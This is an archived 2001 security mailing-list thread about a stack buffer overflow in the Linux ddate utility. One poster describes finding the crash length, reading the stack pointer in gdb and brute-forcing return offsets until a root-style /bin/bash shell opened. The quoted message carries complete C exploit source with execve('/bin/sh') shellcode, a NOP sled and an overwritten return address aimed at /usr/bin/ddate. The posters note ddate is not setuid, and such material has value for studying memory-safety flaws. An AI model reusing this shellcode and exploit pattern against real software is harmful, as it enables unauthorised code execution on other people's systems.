Vulnerability Development mailing list archives

Re: ddate buffer overflow


From: "enthh () FLASH NET" <enthh () FLASH NET>
Date: Sun, 11 Feb 2001 14:19:50 -0500

I wrote the exploit for my Slackware 7.0.0; I'm not even sure which version
of ddate it is.  I tried adding A's from 300 until I got a segmentation
fault (at 410), and then I ran gdb.
# gdb -c core /usr/bin/ddate
(gdb) info r esp
This gave me the esp, and from there I wrote the shellcode/outline for the
exploit and brute forced the esp with offsets -4000 to 4000, incrementing by
1, thus dropping me into a /bin/bash shell.  I then took the ret address
from the working offset and made that the default.

I haven't tried it on any box other than this Slackware 7.0.0, so I'm sorry
that I can't give you the specifics for your Red Hat exploit.  Try doing it
the long way...

----- Original Message -----
From: "s1gnal_9 " <s1gnal_9 () sunos com>
To: <enthh () FLASH NET>
Sent: 10 February, 2001 9:35 PM
Subject: Re: ddate buffer overflow


Hi, I started to write an exploit for it minutes after it was posted too,
just for fun, knowing that it wasn't suid.  I was wondering what distro you
are running.  I started to write one on a friend's RH7 box; for me, I didn't
get eip and ebp of 0x41414141 until I sent 447 A's after the +.  So from
there on I started to make it work, but it isn't executing on the stack...
I've looked over it a bit, and I don't see what I did wrong...

Here's my little version... If you see my problem, I'd really appreciate a
reply... Thanks a lot.

/* I added 8 bytes to buf[] for the 8 bytes that eip and esp take up */

#include <stdio.h>
#include <stdlib.h>     /* atoi() */
#include <string.h>
#include <unistd.h>     /* execl() */

#define OFFSETS 0
#define BUFLEN  455     /* 447 bytes to reach eip, plus the extra 8 */

/* execve("/bin/sh") shellcode, as posted (32-bit x86) */
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Returns the current stack pointer: the value is left in %eax, which is
   the return register on 32-bit x86 (the usual Aleph One trick). */
unsigned long get_sp(void) {
    __asm__("movl %esp, %eax");
}

int main(int argc, char **argv)
{
  char buf[BUFLEN + 1];    /* +1 for the terminating NUL that strcat() needs */
  char buf2[BUFLEN + 2];   /* "+" prefix, payload, NUL */
  int offset;

  if(argc < 2) { offset = OFFSETS; } else { offset = atoi(argv[1]); }

  /* NOP sled, then the shellcode placed just before the last 8 bytes
     (saved frame pointer and return address) */
  memset(buf, 0x90, BUFLEN);
  buf[BUFLEN] = '\0';
  memcpy(buf + BUFLEN - strlen(shellcode) - 8, shellcode, strlen(shellcode));

  /* overwrite the saved return address with a guess at the stack address
     (long is 4 bytes on the 32-bit target this is written for) */
  *(long *)&buf[BUFLEN - 4] = get_sp() - offset;

  /* ddate takes the day offset as "+N"; the payload goes after the + */
  strcpy(buf2, "+");
  strcat(buf2, buf);
  execl("/usr/bin/ddate", "ddate", buf2, NULL);
  return 0;
}